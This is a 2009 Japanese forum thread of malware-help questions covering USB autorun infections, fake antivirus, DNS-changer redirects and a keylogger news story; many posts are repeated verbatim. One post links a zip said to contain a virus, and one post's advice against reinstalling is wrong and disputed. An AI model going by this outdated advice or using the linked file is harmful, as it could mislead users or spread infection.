感染しない。USBとは通常、接続の仕様なので、USBメモリとかUSB接続HDDと表現してほしいね。
ただ、過去に事例が沢山あるが、USBメモリ、HDD、フォトフレーム、MP3プレイヤ等、USB接続を
利用する機器が、工場出荷時から感染していた事例は多く有るので、最新のセキュリティーを使用
することは、もはや必須。
>自分のパソコンからUSBにウィルスは移るんでしょうか?
USBメモリやHDDなど、自分のPCがマルウエアに感染すれば簡単に移る。しかも友人や会社など、周
りに多大な被害をもたらす。(最近、NETから隔離されている警察関連で大問題になってる)
373氏に付け加えるなら、自身で実行してしまう事例。ファイル交換の物、友人からの物、自分で
DLしたもの、まれにメール添付の物、など、自らマルウエアを管理者権限で実行する場合が多い。
又、WinUpdateしていない。ブラウザ自身やフラッシュやブラウザのアドオン(最近ではQuickTimeとか)、
PDFリーダ、他のNET接続するソフト類のアップデートを怠れば、何もしなくても感染する。
最近のNET事情は、知識のある奴でも躊躇するほど悪化していると思うよ。
安全と思われているWebページだって、明日は判らない。
確かに373の言うとおり、質問が判りにくいなw
>オートランのウィルスって他のPCに繋いだことがないUSBにも感染するんですか?
感染しない。USBとは通常、接続の仕様なので、USBメモリとかUSB接続HDDと表現してほしいね。
ただ、過去に事例が沢山あるが、USBメモリ、HDD、フォトフレーム、MP3プレイヤ等、USB接続を
利用する機器が、工場出荷時から感染していた事例は多く有るので、最新のセキュリティーを使用
することは、もはや必須。
>自分のパソコンからUSBにウィルスは移るんでしょうか?
USBメモリやHDDなど、自分のPCがマルウエアに感染すれば簡単に移る。しかも友人や会社など、周
りに多大な被害をもたらす。(最近、NETから隔離されている警察関連で大問題になってる)
373氏に付け加えるなら、自身で実行してしまう事例。ファイル交換の物、友人からの物、自分で
DLしたもの、まれにメール添付の物、など、自らマルウエアを管理者権限で実行する場合が多い。
又、WinUpdateしていない。ブラウザ自身やフラッシュやブラウザのアドオン(最近ではQuickTimeとか)、
PDFリーダ、他のNET接続するソフト類のアップデートを怠れば、何もしなくても感染する。
最近のNET事情は、知識のある奴でも躊躇するほど悪化していると思うよ。
安全と思われているWebページだって、明日は判らない。
377 :名無しさん@お腹いっぱい。:2009/01/27(火) 00:52:52
オートラン経由のウィルスって未だにNOD32でしか発見できないの?
AVGとかでは無理か?
AVGとかでは無理か?
378 :名無しさん@お腹いっぱい。:2009/01/27(火) 01:31:30
対応速度に社別の誤差はあるが発見はできると思う。
まず大手なら検出は可能。
まあ、問題は検出よりブロック、そして駆除だな。
まず大手なら検出は可能。
まあ、問題は検出よりブロック、そして駆除だな。
379 :名無しさん@お腹いっぱい。:2009/01/27(火) 08:25:16
>>375
>WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
>googleに繋がるというものですね。
ちょっと違うのですが、IE6.0で適当なページ(例えば、googleの検索結果のページなど)の
リンクをクリックすると、ステータスバーにhtttp://google-redirect.com/...と出て、
そのリンクにつながりにくい状態になることがある現象です。
でも、英語のページを辞書見ながら読んで、Malwarebytes' Anti-Malwareで解決しました。
ありがとうございました。
>WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
>googleに繋がるというものですね。
ちょっと違うのですが、IE6.0で適当なページ(例えば、googleの検索結果のページなど)の
リンクをクリックすると、ステータスバーにhtttp://google-redirect.com/...と出て、
そのリンクにつながりにくい状態になることがある現象です。
でも、英語のページを辞書見ながら読んで、Malwarebytes' Anti-Malwareで解決しました。
ありがとうございました。
380 :名無しさん@お腹いっぱい。:2009/01/30(金) 14:51:30
381 :名無しさん@お腹いっぱい。:2009/01/30(金) 14:52:43
●警察庁に採用されたウイルス対策ソフトESET Smart Security(NOD32)
ttp://shop.s2mall.net/shareware/08.shtml
↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
●警視庁ネットワーク、ウイルス感染…完全復旧週明けまで掛かる見込み
ttp://headlines.yahoo.co.jp/hl?a=20090124-00000003-yom-soci
警視庁のオンラインシステムに接続している端末のパソコンが、「W32・Downadup・B」と
呼ばれる新種のネットワーク感染型ウイルスに感染し、同庁がウイルス駆除のため、
22日午後から断続的にオンライン業務を停止していることがわかった。
この影響で、東京都内の警察署で、車庫証明の発行業務や免許更新の事務手続き業務を一時、
手作業で行わざるを得なくなった。完全復旧は週明けの26日になる見込み。
サイバー攻撃など外部からの侵入の恐れは低く、USBメモリーなどをパソコンで使った際に
感染した可能性があるとして、同庁で感染経路を調べている。
ttp://shop.s2mall.net/shareware/08.shtml
↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
●警視庁ネットワーク、ウイルス感染…完全復旧週明けまで掛かる見込み
ttp://headlines.yahoo.co.jp/hl?a=20090124-00000003-yom-soci
警視庁のオンラインシステムに接続している端末のパソコンが、「W32・Downadup・B」と
呼ばれる新種のネットワーク感染型ウイルスに感染し、同庁がウイルス駆除のため、
22日午後から断続的にオンライン業務を停止していることがわかった。
この影響で、東京都内の警察署で、車庫証明の発行業務や免許更新の事務手続き業務を一時、
手作業で行わざるを得なくなった。完全復旧は週明けの26日になる見込み。
サイバー攻撃など外部からの侵入の恐れは低く、USBメモリーなどをパソコンで使った際に
感染した可能性があるとして、同庁で感染経路を調べている。
382 :名無しさん@お腹いっぱい。:2009/01/30(金) 15:23:28
ESET終わったな
383 :名無しさん@お腹いっぱい。:2009/01/30(金) 15:37:17
始まってもいないのに終わったも糞も無いだろw
384 :名無しさん@お腹いっぱい。:2009/01/30(金) 17:57:30
ですよねー
385 :名無しさん@お腹いっぱい。:2009/01/30(金) 18:20:52
新種に感染して名前が在るってのも変だとか
記者は思わないのかねぇ
Nortonでずばりの名前がある
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-123015-3826-99
記者は思わないのかねぇ
Nortonでずばりの名前がある
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-123015-3826-99
386 :名無しさん@お腹いっぱい。:2009/02/01(日) 09:44:09
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1217945792
先日、「えこでこツール」というフリーソフトをDLし、 解凍してフォルダを開いたところ
「トロイの木馬に感染しました」というメッセージが出ました。
どうやら中に入っていた「uninstal.exe」が原因のようです。
慌てて隔離し、隔離室を空にしたのですが、これは削除出来たのでしょうか?
これと同じ症状が出てる troj_generic.dis
確かベクターとかでダウンロードしたはずなのになんでウイルスが入ってるんだろう
ダウンロードしてからかなり時間がたってるのに何で今頃警告が来るんだろう?
ワケがわからん
最近やったことといえばhugflashってソフトを
間違ってアンインスツールしたことぐらいしか思い当たらん
先日、「えこでこツール」というフリーソフトをDLし、 解凍してフォルダを開いたところ
「トロイの木馬に感染しました」というメッセージが出ました。
どうやら中に入っていた「uninstal.exe」が原因のようです。
慌てて隔離し、隔離室を空にしたのですが、これは削除出来たのでしょうか?
これと同じ症状が出てる troj_generic.dis
確かベクターとかでダウンロードしたはずなのになんでウイルスが入ってるんだろう
ダウンロードしてからかなり時間がたってるのに何で今頃警告が来るんだろう?
ワケがわからん
最近やったことといえばhugflashってソフトを
間違ってアンインスツールしたことぐらいしか思い当たらん
387 :名無しさん@お腹いっぱい。:2009/02/02(月) 18:04:51
そいつは有名なソフトだな。
対応されたとか情報が見当たらんけど
とりあえずテンプレ使ってくれ。
対応されたとか情報が見当たらんけど
とりあえずテンプレ使ってくれ。
388 :名無しさん@お腹いっぱい。:2009/02/05(木) 21:24:56
【使用OS】 WindowsXP SP3
【Microsoft Update(MU)の状態】
【使用セキュリティソフトとバージョン】 AVG8、CA Anti-virus(試用版)、
KINGSOFT、Avast! 4.8Home、Dr.WEB
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 Yes
【スパイウェア対策ソフト】 Spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 Yes
【ルータの有無】 Yes
【スキャンの結果何が検出されたか】多過ぎて忘れた…
「XP AntiSpyware 2009」とかいうスパイウェアをうっかり踏んでしまいました
これによりウイルスがどっと入ってきて、全ドライブのhtmlファイル、
一部の実行ファイルが改竄され、何度駆除してもまだ残ってるようです
何度か再起動するとエクスプローラが起動しなかったり、
プリントスプーラなどがエラーを起こします
再インスコも何度もしましたが、他のドライブに感染したファイルが残っているようで
いたちごっこを繰り返してます
やっぱりフリー系よりノートンやバスターの方がいいのでしょうか?
しかしもう疲れました、PC窓から投げたいですorz
【Microsoft Update(MU)の状態】
【使用セキュリティソフトとバージョン】 AVG8、CA Anti-virus(試用版)、
KINGSOFT、Avast! 4.8Home、Dr.WEB
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 Yes
【スパイウェア対策ソフト】 Spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 Yes
【ルータの有無】 Yes
【スキャンの結果何が検出されたか】多過ぎて忘れた…
「XP AntiSpyware 2009」とかいうスパイウェアをうっかり踏んでしまいました
これによりウイルスがどっと入ってきて、全ドライブのhtmlファイル、
一部の実行ファイルが改竄され、何度駆除してもまだ残ってるようです
何度か再起動するとエクスプローラが起動しなかったり、
プリントスプーラなどがエラーを起こします
再インスコも何度もしましたが、他のドライブに感染したファイルが残っているようで
いたちごっこを繰り返してます
やっぱりフリー系よりノートンやバスターの方がいいのでしょうか?
しかしもう疲れました、PC窓から投げたいですorz
389 :名無しさん@お腹いっぱい。:2009/02/05(木) 21:38:45
390 :名無しさん@お腹いっぱい。:2009/02/05(木) 21:39:55
自力で問題を解決できるような人なら
フリーの物と製品版、どちらを使っても差はあまりないと思うが
君は大人しく製品版のものを使った方がいいと思う。
フリーの物と製品版、どちらを使っても差はあまりないと思うが
君は大人しく製品版のものを使った方がいいと思う。
391 :名無しさん@お腹いっぱい。:2009/02/05(木) 21:50:42
マジレスお願いします。
いつも使ってるパソコン、ネット接続すると勝手に再起動するんだけど、
どうすればいいですか?
いつも使ってるパソコン、ネット接続すると勝手に再起動するんだけど、
どうすればいいですか?
392 :名無しさん@お腹いっぱい。:2009/02/05(木) 22:00:52
393 :名無しさん@お腹いっぱい。:2009/02/05(木) 22:04:16
394 :名無しさん@お腹いっぱい。:2009/02/05(木) 22:05:04
395 :名無しさん@お腹いっぱい。:2009/02/05(木) 22:40:55
【使用OS】 「XP」
【使用セキュリティソフトとバージョン】 「無料ソフト」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新してる」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
会社のPCなので詳しいスペックはわからないっすorz
マルウェアが発見されましたって出て、HDドライブCが開けなくなったり。外付けHDが認識しなくなったり。
会社のPCが無料ソフトってどうなんだろうな・・・
【使用セキュリティソフトとバージョン】 「無料ソフト」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新してる」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
会社のPCなので詳しいスペックはわからないっすorz
マルウェアが発見されましたって出て、HDドライブCが開けなくなったり。外付けHDが認識しなくなったり。
会社のPCが無料ソフトってどうなんだろうな・・・
今のところ除去できないやつはW32/Virut.hというものらしいです
まさかバスターまでやられるなんて・・・orz
まさかバスターまでやられるなんて・・・orz
398 : ◆N9P3SuvBPo :2009/02/06(金) 00:16:09
>397
リカバリを強く推奨します。
リカバリを強く推奨します。
399 :名無しさん@お腹いっぱい。:2009/02/06(金) 01:28:29
400 :名無しさん@お腹いっぱい。:2009/02/06(金) 02:02:02
【使用OS】 XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウィルスバスター2008
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 ウィルスバスターに任せてます
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
トラッキングクッキー程度しか検出されませんでした
今、普通に別のスレでレスしてたら、いきなりヘッドフォンに子供っぽい笑い声が途切れ気味で入ってきて、いきなり「あーあー」って喋りだしてきました。
感じ日本語じゃないっぽくて、一回ネット回線切ってまた繋げなおしたら叫び声っぽいのに変わってました。
ウィルスバスターには常に監視させており、FWも機能中です。
何かをDLしたわけでもありません。
どういった症状なんでしょうかコレ…。
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウィルスバスター2008
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 ウィルスバスターに任せてます
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
トラッキングクッキー程度しか検出されませんでした
今、普通に別のスレでレスしてたら、いきなりヘッドフォンに子供っぽい笑い声が途切れ気味で入ってきて、いきなり「あーあー」って喋りだしてきました。
感じ日本語じゃないっぽくて、一回ネット回線切ってまた繋げなおしたら叫び声っぽいのに変わってました。
ウィルスバスターには常に監視させており、FWも機能中です。
何かをDLしたわけでもありません。
どういった症状なんでしょうかコレ…。
401 :名無しさん@お腹いっぱい。:2009/02/06(金) 03:10:24
バスター常駐させとけば安全だと思ってる人って・・・
402 :名無しさん@お腹いっぱい。:2009/02/06(金) 07:19:20
少年と男性はオンラインゲーム仲間。男性が少年に「キャラクターを強くするプログラムをあげる」と偽って、
実際にはIDやパスワードなど、パソコンのキー操作の履歴を盗み取るスパイソフト「キーロガー」をネット上から
送りつけた。少年はゲームの動きが悪くなったことからキーロガーに気づき、ソフトを解析。盗まれた履歴の
送付先になっていた男性のメールアドレスやID、パスワードを割り出したという。
asahi.com http://www.asahi.com/national/update/0205/NGY200902050001.html
↑この少年が行った手口を、バカでもわかるように解説してください。m(._.)m
実際にはIDやパスワードなど、パソコンのキー操作の履歴を盗み取るスパイソフト「キーロガー」をネット上から
送りつけた。少年はゲームの動きが悪くなったことからキーロガーに気づき、ソフトを解析。盗まれた履歴の
送付先になっていた男性のメールアドレスやID、パスワードを割り出したという。
asahi.com http://www.asahi.com/national/update/0205/NGY200902050001.html
↑この少年が行った手口を、バカでもわかるように解説してください。m(._.)m
403 :名無しさん@お腹いっぱい。:2009/02/06(金) 07:25:38
ソフトを解析。盗まれた履歴の送付先になっていた男性の
メールアドレスやID、パスワードを割り出した
メールアドレスやID、パスワードを割り出した
404 :名無しさん@お腹いっぱい。:2009/02/06(金) 07:51:57
それ「解説」やない。
405 :名無しさん@お腹いっぱい。:2009/02/06(金) 08:15:02
パソコンのキー操作の履歴を盗み取るスパイソフト「キーロガー」をネット上から
送りつけた。
送りつけた。
406 :名無しさん@お腹いっぱい。:2009/02/06(金) 08:20:16
それ「少年が行った手口」やない。
407 :名無しさん@お腹いっぱい。:2009/02/06(金) 08:26:05
少年と男性は ゲ
イ
イ
409 :名無しさん@お腹いっぱい。:2009/02/06(金) 17:36:55
410 :名無しさん@お腹いっぱい。:2009/02/13(金) 17:39:03
★質問用テンプレ★
【使用OS】 「XP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2008」「ZoneAlarm」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「Spybot」「AD-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有 」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「何も見つからない」
質問です。
(スパイウェアスレで質問したのですが、普通に広告では?と言われてしまったのですが、
どうも不安なのでこちらでも質問いたしました。)
Firefoxを使っているのですが、
毎回起こるのではなく、ごくたまになのですが、
googleの検索結果に出てきたリンク先をクリックしたときに、
一瞬、67.210.15.11とか67.210.14.30などのIPアドレスに勝手にアクセスして
その後1001anything.comやらpc-health.infoやらのアドレスに勝手にアクセスしようと試みて
最後は自動でgoogleのトップページに戻ってしまうことがあります。
これは原因はなにかに感染しているということでしょうか?
なにに感染しているのでしょうか?検索してもさっぱりわかりません。。。
一応、spybotもadawareもトレンドマイクロのウイルス&スパイウェアチェックも全部かけました。
【使用OS】 「XP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2008」「ZoneAlarm」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「Spybot」「AD-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有 」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「何も見つからない」
質問です。
(スパイウェアスレで質問したのですが、普通に広告では?と言われてしまったのですが、
どうも不安なのでこちらでも質問いたしました。)
Firefoxを使っているのですが、
毎回起こるのではなく、ごくたまになのですが、
googleの検索結果に出てきたリンク先をクリックしたときに、
一瞬、67.210.15.11とか67.210.14.30などのIPアドレスに勝手にアクセスして
その後1001anything.comやらpc-health.infoやらのアドレスに勝手にアクセスしようと試みて
最後は自動でgoogleのトップページに戻ってしまうことがあります。
これは原因はなにかに感染しているということでしょうか?
なにに感染しているのでしょうか?検索してもさっぱりわかりません。。。
一応、spybotもadawareもトレンドマイクロのウイルス&スパイウェアチェックも全部かけました。
411 :名無しさん@お腹いっぱい。:2009/02/13(金) 17:47:17
起動すると 正しくないイメージ〜 って出ちゃうんですけど どう直せば良いですか?
412 :名無しさん@お腹いっぱい。:2009/02/13(金) 18:14:54
413 :名無しさん@お腹いっぱい。:2009/02/13(金) 23:19:49
ウイルスバスターの会社(トレンドマイクロ)の社長は女性でそこそこ綺麗
トレンドマイクロの社長
http://internet.watch.impress.co.jp/cda/parts/image_for_link/14506-8141-1-1.html
ソース
http://internet.watch.impress.co.jp/cda/news/2005/06/24/8141.html
トレンドマイクロの社長
http://internet.watch.impress.co.jp/cda/parts/image_for_link/14506-8141-1-1.html
ソース
http://internet.watch.impress.co.jp/cda/news/2005/06/24/8141.html
414 :名無しさん@お腹いっぱい。:2009/02/13(金) 23:23:33
キューティクルが光ってる!
415 :名無しさん@お腹いっぱい。:2009/02/14(土) 00:09:42
416 :名無しさん@お腹いっぱい。:2009/02/14(土) 00:56:28
どうでもいい……スレ違いだし
417 :名無しさん@お腹いっぱい。:2009/02/14(土) 00:58:15
>>410
リカバリしろ
リカバリしろ
418 :名無しさん@お腹いっぱい。:2009/02/14(土) 23:50:18
>>410
その解説をします。
GOOGLE検索であろうが、YAHOO検索であろうが、検索で表示されたサイトを
クリックするとリダイレクト(他のサイトへ強制移動)されますね?
パソコンがウィルスに感染しているのでは無く、そのサイトがフィッシングサイト、
又は、ウィルスコードを記述してあるサイトの可能性があるのです。
最近GOOGLEでは、そういったサイトに入れないように、ブロックして元の
検索画面に戻すという事を行っているようです。
悪意のあるフィッシングサイトでは、いかにも本物と同じようなHPもありますし、
偽物のセキュリティプログラムを購入させようと、勝手にHP内でスキャンをし、
ウィルスに感染してます!という警告を出すHPもちらほら見る事もあります。
僕が見る限り、このケースをだけ見ると感染していないように思えます。
あと、ウィルス感染の疑いがある時は絶対に!リカバリーしないでください。
無意味です。
ありえないかもしれませんが、ご心配であれば、別のウィルススキャン方法も
ありますので、ぜひお試しください。
その解説をします。
GOOGLE検索であろうが、YAHOO検索であろうが、検索で表示されたサイトを
クリックするとリダイレクト(他のサイトへ強制移動)されますね?
パソコンがウィルスに感染しているのでは無く、そのサイトがフィッシングサイト、
又は、ウィルスコードを記述してあるサイトの可能性があるのです。
最近GOOGLEでは、そういったサイトに入れないように、ブロックして元の
検索画面に戻すという事を行っているようです。
悪意のあるフィッシングサイトでは、いかにも本物と同じようなHPもありますし、
偽物のセキュリティプログラムを購入させようと、勝手にHP内でスキャンをし、
ウィルスに感染してます!という警告を出すHPもちらほら見る事もあります。
僕が見る限り、このケースをだけ見ると感染していないように思えます。
あと、ウィルス感染の疑いがある時は絶対に!リカバリーしないでください。
無意味です。
ありえないかもしれませんが、ご心配であれば、別のウィルススキャン方法も
ありますので、ぜひお試しください。
420 :名無しさん@お腹いっぱい。:2009/02/15(日) 19:06:10
>>418
まあ、それはいいがバスタはセーフモードで使えないぞ?
まあ、それはいいがバスタはセーフモードで使えないぞ?
421 :名無しさん@お腹いっぱい。:2009/02/15(日) 19:07:17
>ウィルス感染の疑いがある時は絶対に!リカバリーしないでください。
なんだこれ?ソースプリーズ。
なんだこれ?ソースプリーズ。
422 :名無しさん@お腹いっぱい。:2009/02/15(日) 19:14:15
ウイルスに感染したらリカバリ・クリーンインストールが基本。
システムの復元 を リカバリ だと思ってるとか言うオチかな?
結構間違ってる人居るみたいだし
システムの復元 を リカバリ だと思ってるとか言うオチかな?
結構間違ってる人居るみたいだし
423 :名無しさん@お腹いっぱい。:2009/02/15(日) 19:21:23
ていうか>>410は何かのアドウェアに罹ってるだろ
424 :名無しさん@お腹いっぱい。:2009/02/15(日) 19:25:46
しかし「Spybot」「AD-Aware」使っててかかってるからな……
あとは、リカバリかAVG Antirootkitでも試すぐらいしか
あとは、リカバリかAVG Antirootkitでも試すぐらいしか
425 : ◆N9P3SuvBPo :2009/02/15(日) 19:45:09
>419
ttp://secure47.blog114.fc2.com/blog-entry-1.html
>1.ウィンドウズのアップデートを必ず行う。
>オフィスの脆弱性も、WINDOWS UPDATEで一緒にダウンロードする事が可能です。
Officeの脆弱性はWindowsUpdateでは修正されません。
Officeの脆弱性はMicrosoftUpdateを通じて修正されます。
ttp://secure47.blog114.fc2.com/blog-entry-1.html
>1.ウィンドウズのアップデートを必ず行う。
>オフィスの脆弱性も、WINDOWS UPDATEで一緒にダウンロードする事が可能です。
Officeの脆弱性はWindowsUpdateでは修正されません。
Officeの脆弱性はMicrosoftUpdateを通じて修正されます。
426 :名無しさん@お腹いっぱい。:2009/02/15(日) 19:49:32
>>425
補足乙
補足乙
427 : ◆N9P3SuvBPo :2009/02/15(日) 21:12:37
ちなみに、ITの資格を持ってる人なら、リカバリと修復インストールの違いも分かるはずですがねえ…。
428 :名無しさん@お腹いっぱい。:2009/02/15(日) 21:25:17
ITの資格ならぬ、ITの死角ですな
429 :名無しさん@お腹いっぱい。:2009/02/15(日) 21:29:52
>>427
資格いうやつほどあてにならんのがIT業界だすw
資格いうやつほどあてにならんのがIT業界だすw
430 : ◆N9P3SuvBPo :2009/02/15(日) 22:05:11
俺IT関連の資格は持ってないが、ウイルスに感染することは皆無ですねえ。
けど、そんな俺も昔はウイルスに感染した経験を持ってますが。
けど、そんな俺も昔はウイルスに感染した経験を持ってますが。
431 :名無しさん@お腹いっぱい。:2009/02/16(月) 00:25:07
サイトが危険かどうか判定するスレってないの?
432 : ◆N9P3SuvBPo :2009/02/16(月) 00:29:21
>431
それでしたらラウンジやPC初心者にありますよ。
「勇気」とか「鑑定」で検索してください。
それでしたらラウンジやPC初心者にありますよ。
「勇気」とか「鑑定」で検索してください。
433 : ◆N9P3SuvBPo :2009/02/16(月) 00:30:25
PC初心者じゃなくて初心者の質問だ
434 :名無しさん@お腹いっぱい。:2009/02/16(月) 00:36:47
435 :名無しさん@お腹いっぱい。:2009/02/16(月) 08:52:34
自作自演w
436 :名無しさん@お腹いっぱい。:2009/02/16(月) 10:51:08
Malwarebytes' Anti-Malwareを入れようと思うんだけど、
このソフトって危険?
このソフトって危険?
437 :名無しさん@お腹いっぱい。:2009/02/16(月) 18:11:16
>>410はDNSChanger系のトロイに感染してるんでしょ
症状見たらすぐわかるじゃん
怪しいのはFirefoxのexeが入っているフォルダの中かもね
componentsフォルダの中に怪しいdll入ってないか?iamfamous.dllとか
そうなら違う駆除ソフトいろいろ試してみるといいよ
つーか、このスレこんなにレベル低かったっけ?
症状見たらすぐわかるじゃん
怪しいのはFirefoxのexeが入っているフォルダの中かもね
componentsフォルダの中に怪しいdll入ってないか?iamfamous.dllとか
そうなら違う駆除ソフトいろいろ試してみるといいよ
つーか、このスレこんなにレベル低かったっけ?
438 :名無しさん@お腹いっぱい。:2009/02/16(月) 18:19:37
439 :名無しさん@お腹いっぱい。:2009/02/16(月) 18:41:54
440 :名無しさん@お腹いっぱい。:2009/02/17(火) 13:08:11
backdoorトロイに感染したファイルがあります。
ざまあ
ざまあ
441 :名無しさん@お腹いっぱい。:2009/02/17(火) 15:28:43
>backdoorトロイに感染したファイル
トロイに感染したファイル?
ほほう。
トロイに感染したファイル?
ほほう。
442 :名無しさん@お腹いっぱい。:2009/02/20(金) 14:27:04
http://hk.geocities.com/sa_icecream/sa99for29.zip
この中にあるウィルスぬいてほしいお
この中にあるウィルスぬいてほしいお
443 :名無しさん@お腹いっぱい。:2009/02/20(金) 15:26:39
消したが、それ以降の指示がないからファイルは消した。
444 :名無しさん@お腹いっぱい。:2009/02/21(土) 01:29:24
知人から、USBメモリからPC本体に感染し、
いくつかのフォルダを削除して自らも消滅する
ウィルスが出たらしい、と聞きました。
しかし、いくつかの単語を放り込んで検索してみても
そんな症状は出てきません。
削除型の症状は、ほぼすべてがワームで、USBの
autorunで感染するタイプのものは、検索には
ひっかかってきませんでした。
何か聞いたことある方いませんか?
いくつかのフォルダを削除して自らも消滅する
ウィルスが出たらしい、と聞きました。
しかし、いくつかの単語を放り込んで検索してみても
そんな症状は出てきません。
削除型の症状は、ほぼすべてがワームで、USBの
autorunで感染するタイプのものは、検索には
ひっかかってきませんでした。
何か聞いたことある方いませんか?
445 :名無しさん@お腹いっぱい。:2009/02/22(日) 00:34:26
>>444
したとかみた方が早いかも。
ttp://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20090205021020.html
したとかみた方が早いかも。
ttp://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20090205021020.html
446 :名無しさん@お腹いっぱい。:2009/02/22(日) 02:44:41
>>445
ありがとう。
見てみたけど、該当しそうなものはみつかりませんでした。
自身で体験してないから詳細わからないのがもどかしいです。
知人の言うとおりだとすれば、定義ファイル対応前に破壊活動して
消滅されたらこちらでは対処しようがないし、通報もできません。
削除されたファイルがどれかわからないという事態も想定されますし、
場合によってはどこかに送信後消されている可能性もあるかも
しれません。
ただ、USBにも本体にもウィルスが残っていないのであれば、
どうやって感染活動しているのかよくわかりませんし、
実は原因が別にあるんじゃないかとも疑っているんです。
それで、何か情報があればと思いまして。
ありがとう。
見てみたけど、該当しそうなものはみつかりませんでした。
自身で体験してないから詳細わからないのがもどかしいです。
知人の言うとおりだとすれば、定義ファイル対応前に破壊活動して
消滅されたらこちらでは対処しようがないし、通報もできません。
削除されたファイルがどれかわからないという事態も想定されますし、
場合によってはどこかに送信後消されている可能性もあるかも
しれません。
ただ、USBにも本体にもウィルスが残っていないのであれば、
どうやって感染活動しているのかよくわかりませんし、
実は原因が別にあるんじゃないかとも疑っているんです。
それで、何か情報があればと思いまして。
447 : ◆N9P3SuvBPo :2009/02/22(日) 15:03:44
>446
例えばwebからの感染であれば…
あるwebサイトを訪問
↓
最新の定義にされたソフトでも発見できない亜種に密かに感染(潜伏)
↓
そのPCにUSBメモリを挿し込む
↓
そのUSBメモリに感染
あと、USBメモリー→PC→USBメモリーというパターン(橋渡しタイプ)は確率低いか…
どの道そちらで再検証するしかないですね。
俺らは画面の向こうで偉そうな事しか言えませんが…。
例えばwebからの感染であれば…
あるwebサイトを訪問
↓
最新の定義にされたソフトでも発見できない亜種に密かに感染(潜伏)
↓
そのPCにUSBメモリを挿し込む
↓
そのUSBメモリに感染
あと、USBメモリー→PC→USBメモリーというパターン(橋渡しタイプ)は確率低いか…
どの道そちらで再検証するしかないですね。
俺らは画面の向こうで偉そうな事しか言えませんが…。
448 :名無しさん@お腹いっぱい。:2009/02/22(日) 18:00:50
ttp://up.b9dm.com/video.php/vid_8546.htm
B9ってサイトでアニメ見ようとしたらavastで反応して削除したのですが
もう1回検査するだけで大丈夫でしょうか?削除したので分かりませんが
やばい物ですか?
B9ってサイトでアニメ見ようとしたらavastで反応して削除したのですが
もう1回検査するだけで大丈夫でしょうか?削除したので分かりませんが
やばい物ですか?
449 :名無しさん@お腹いっぱい。:2009/02/22(日) 20:09:50
Cryp_Xin2
ってウィルスに汚染されたんだけど、グーグルで検索しても
全然情報なくて
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CRYP%5FXIN2&VSect=Sn
とりあえずここくらいなんだけど英語だし
どうしたらいいんだ。削除したけど「駆除不可能なウィルス」って
書いてるし・・ハァ
ってウィルスに汚染されたんだけど、グーグルで検索しても
全然情報なくて
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CRYP%5FXIN2&VSect=Sn
とりあえずここくらいなんだけど英語だし
どうしたらいいんだ。削除したけど「駆除不可能なウィルス」って
書いてるし・・ハァ
450 :名無しさん@お腹いっぱい。:2009/02/22(日) 20:29:04
セーフモードからは?
451 :名無しさん@お腹いっぱい。:2009/02/23(月) 07:35:11
>>449
削除したならいいだろ。
他のexeやdllを書き換える形で寄生するのが本来のウイルスで、
それを元に戻すのを「駆除」と表現する。
元々存在しなかったexeやdllを新たに生成するよくあるトロイでは
「駆除できないので削除」となる。表現の問題だよ。
削除したならいいだろ。
他のexeやdllを書き換える形で寄生するのが本来のウイルスで、
それを元に戻すのを「駆除」と表現する。
元々存在しなかったexeやdllを新たに生成するよくあるトロイでは
「駆除できないので削除」となる。表現の問題だよ。
452 :名無しさん@お腹いっぱい。:2009/02/24(火) 13:20:16
flv動画から色々と変換してくれるツール探してたら
窓の杜にニコキャッチングとかいうのがあったからサイトにいってダウンロード&インストールし終わって
ファイルの中にあった何かわからないけど開いてみたら一瞬黒い画面の窓が開いて
英語っぽい白い文字がずらーと流れていって窓が勝手に閉じたんですが
そのあとにウィルス検索してみたら10個もかかりました(いつもは1〜2個。
名前までは覚えてませんがこの「ニコキャッチング」の中にはいっていたのでしょうか?
